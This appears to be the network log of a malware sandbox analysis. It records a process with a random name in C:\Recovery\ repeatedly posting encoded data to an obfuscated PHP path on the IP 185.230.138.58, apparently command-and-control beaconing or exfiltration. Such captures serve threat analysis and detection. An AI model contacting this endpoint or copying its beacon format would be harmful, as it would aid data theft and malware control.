                                                                                                                                        Dec 21, 2024 10:09:57.667139053 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1008
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:09:58.016486883 CET1008OUTData Raw: 57 57 5f 5a 5f 47 54 51 5b 59 51 56 59 5a 58 5d 56 5c 5d 59 5a 51 5b 45 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WW_Z_GTQ[YQVYZX]V\]YZQ[E[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!,4<;X&-=-6#>5*/41>))3'>^'3*'^& X/<
                                                                                                                                        Dec 21, 2024 10:09:58.914694071 CET25INHTTP/1.1 100 Continue


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        118192.168.2.450126185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:09:58.964138031 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1892
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:09:59.314552069 CET1892OUTData Raw: 52 54 5f 5c 5a 45 54 56 5b 59 51 56 59 5d 58 5d 56 5c 5d 5b 5a 58 5b 49 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: RT_\ZETV[YQVY]X]V\][ZX[I[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!B;1$X#^1*>=5">.[>?,Y'+9Z()3$=$X'Q%0'^& X/
                                                                                                                                        Dec 21, 2024 10:10:00.207581997 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:10:00.444787979 CET349INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:10:00 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 39 38 0d 0a 01 1f 25 5a 21 26 2b 57 26 2e 38 0b 25 2e 26 5b 3f 3e 09 5d 24 05 31 45 34 0d 20 1b 3e 11 0d 5b 25 3d 2e 1b 27 02 33 0d 3e 33 2b 12 3a 30 20 46 04 1c 23 5e 2b 0d 2a 19 2a 06 2c 15 2c 01 21 58 3f 54 2a 5d 23 3c 25 59 34 07 36 5e 20 0f 35 51 3c 00 31 0a 29 24 28 1d 2e 2d 21 02 20 3a 23 56 0b 1f 39 1f 29 09 21 02 27 27 23 05 25 37 32 51 37 25 38 0b 35 54 37 1d 23 3e 2b 10 26 06 08 58 22 01 37 0a 3d 06 25 03 26 39 24 56 2e 17 26 52 20 0c 29 50 05 35 57 52 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 98%Z!&+W&.8%.&[?>]$1E4 >[%=.'3>3+:0 F#^+**,,!X?T*]#<%Y46^ 5Q<1)$(.-! :#V9)!''#%72Q7%85T7#>+&X"7=%&9$V.&R )P5WR0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        119192.168.2.450127185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:09:59.084496975 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:09:59.438589096 CET1012OUTData Raw: 52 52 5a 5f 5a 47 51 50 5b 59 51 56 59 5e 58 59 56 5c 5d 5c 5a 5a 5b 43 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: RRZ_ZGQP[YQVY^XYV\]\ZZ[C[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!F/$Y#,%:[)=1 [),#&8=)9V0($':''^& X/8
                                                                                                                                        Dec 21, 2024 10:10:00.327812910 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:10:00.561605930 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:10:00 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        120192.168.2.450129185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:10:00.810203075 CET425OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Dec 21, 2024 10:10:01.156528950 CET1012OUTData Raw: 57 54 5a 5a 5f 48 51 54 5b 59 51 56 59 5d 58 5e 56 5a 5d 57 5a 5e 5b 44 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WTZZ_HQT[YQVY]X^VZ]WZ^[D[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!-!< $&>Z>6T">=*?2>+*+T3>334:Y0:'^& X/
                                                                                                                                        Dec 21, 2024 10:10:02.057312965 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:10:02.297174931 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:10:01 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        121192.168.2.450130185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:10:02.693581104 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:10:03.045995951 CET1012OUTData Raw: 52 52 5a 5a 5a 45 51 57 5b 59 51 56 59 58 58 5e 56 59 5d 57 5a 51 5b 41 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: RRZZZEQW[YQVYXX^VY]WZQ[A[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX",Y!,#^$?**=*W4>&)/$['+*+9?T&-?$>''^& X/
                                                                                                                                        Dec 21, 2024 10:10:03.949073076 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:10:04.181375980 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:10:03 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        122192.168.2.450131185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:10:04.433207989 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:10:04.780858994 CET1012OUTData Raw: 57 52 5f 58 5f 42 54 55 5b 59 51 56 59 5f 58 5e 56 5e 5d 5d 5a 5d 5b 48 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WR_X_BTU[YQVY_X^V^]]Z][H[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX",'#/;^1/*_).:S =)??&)X(9&=$]07\0:'^& X/<


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        123192.168.2.450132185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:10:05.573731899 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1892
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:10:05.924612045 CET1892OUTData Raw: 57 5e 5f 5a 5f 42 51 54 5b 59 51 56 59 5c 58 5b 56 53 5d 5a 5a 5d 5b 45 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: W^_Z_BQT[YQVY\X[VS]ZZ][E[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX",; /;[&Y>2#X)*'&8&))7R&=,^'4*':'^& X/0
                                                                                                                                        Dec 21, 2024 10:10:06.853013039 CET374INHTTP/1.1 100 Continue
                                                                                                                                        Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 61 74 2c 20 32 31 20 44 65 63 20 32 30 32 34 20 30 39 3a 31 30 3a 30 36 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 0d 0a 39 38 0d 0a 01 1f 25 13 21 1c 28 0e 26 13 23 55 27 07 32 12 3f 2e 34 06 24 2c 21 0a 22 33 15 01 2a 01 20 03 24 07 36 15 33 02 06 57 3c 20 24 01 2d 1a 20 46 04 1c 23 59 3d 30 32 52 3e 38 33 05 2f 06 3a 00 28 32 2e 19 22 3f 21 5a 21 3e 2d 03 22 22 22 0b 3c 39 2e 53 29 1d 27 01 3a 3e 3a 10 20 3a 23 56 0b 1f 3a 0d 3e 30 3a 59 30 37 20 5c 32 09 26 1c 20 36 37 56 36 0b 3f 1c 22 2d 05 1f 25 16 3d 03 21 38 09 0f 2a 01 2e 5a 31 29 02 12 3a 07 26 52 20 0c 29 50 [TRUNCATED]
                                                                                                                                        Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Sat, 21 Dec 2024 09:10:06 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-Encoding98%!(&#U'2?.4$,!"3* $63W< $- F#Y=02R>83/:(2."?!Z!>-"""<9.S)':>: :#V:>0:Y07 \2& 67V6?"-%=!8*.Z1):&R )P5WR0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        124192.168.2.450133185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:10:05.696755886 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:10:06.046601057 CET1012OUTData Raw: 57 52 5a 5b 5f 49 51 56 5b 59 51 56 59 59 58 51 56 5b 5d 56 5a 5a 5b 45 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WRZ[_IQV[YQVYYXQV[]VZZ[E[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!81 4/#%9*#>*/(\1<,$.<$'0:'^& X/$
                                                                                                                                        Dec 21, 2024 10:10:06.949990988 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:10:07.189671040 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:10:06 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        125192.168.2.450134185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:10:07.436986923 CET425OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Dec 21, 2024 10:10:07.796189070 CET1012OUTData Raw: 52 54 5f 59 5a 43 54 52 5b 59 51 56 59 58 58 5e 56 53 5d 57 5a 50 5b 43 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: RT_YZCTR[YQVYXX^VS]WZP[C[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX"88X7&==:S .Z+,$28%Y?3R'.$$6''^& X/
                                                                                                                                        Dec 21, 2024 10:10:08.687418938 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:10:08.921477079 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:10:08 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        126192.168.2.450135185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:10:09.167073011 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:10:09.514945030 CET1012OUTData Raw: 52 54 5f 5e 5f 43 54 53 5b 59 51 56 59 5c 58 5a 56 5a 5d 59 5a 5d 5b 48 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: RT_^_CTS[YQVY\XZVZ]YZ][H[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!B;2/74$<)U7-"*?(%6<$&.34&]0'^& X/0
                                                                                                                                        Dec 21, 2024 10:10:10.411156893 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:10:10.645369053 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:10:10 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        127192.168.2.450136185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:10:10.918448925 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:10:11.268635035 CET1012OUTData Raw: 57 5e 5a 58 5a 47 54 52 5b 59 51 56 59 5b 58 5a 56 59 5d 58 5a 5a 5b 42 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: W^ZXZGTR[YQVY[XZVY]XZZ[B[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!;4<1/6=&#.6>?8186)*7S3<0"X3'^& X/,


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        128192.168.2.450137185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:10:11.982115984 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1868
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:10:12.327358007 CET1868OUTData Raw: 57 5e 5f 5a 5f 45 54 53 5b 59 51 56 59 5e 58 5b 56 5c 5d 59 5a 51 5b 46 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
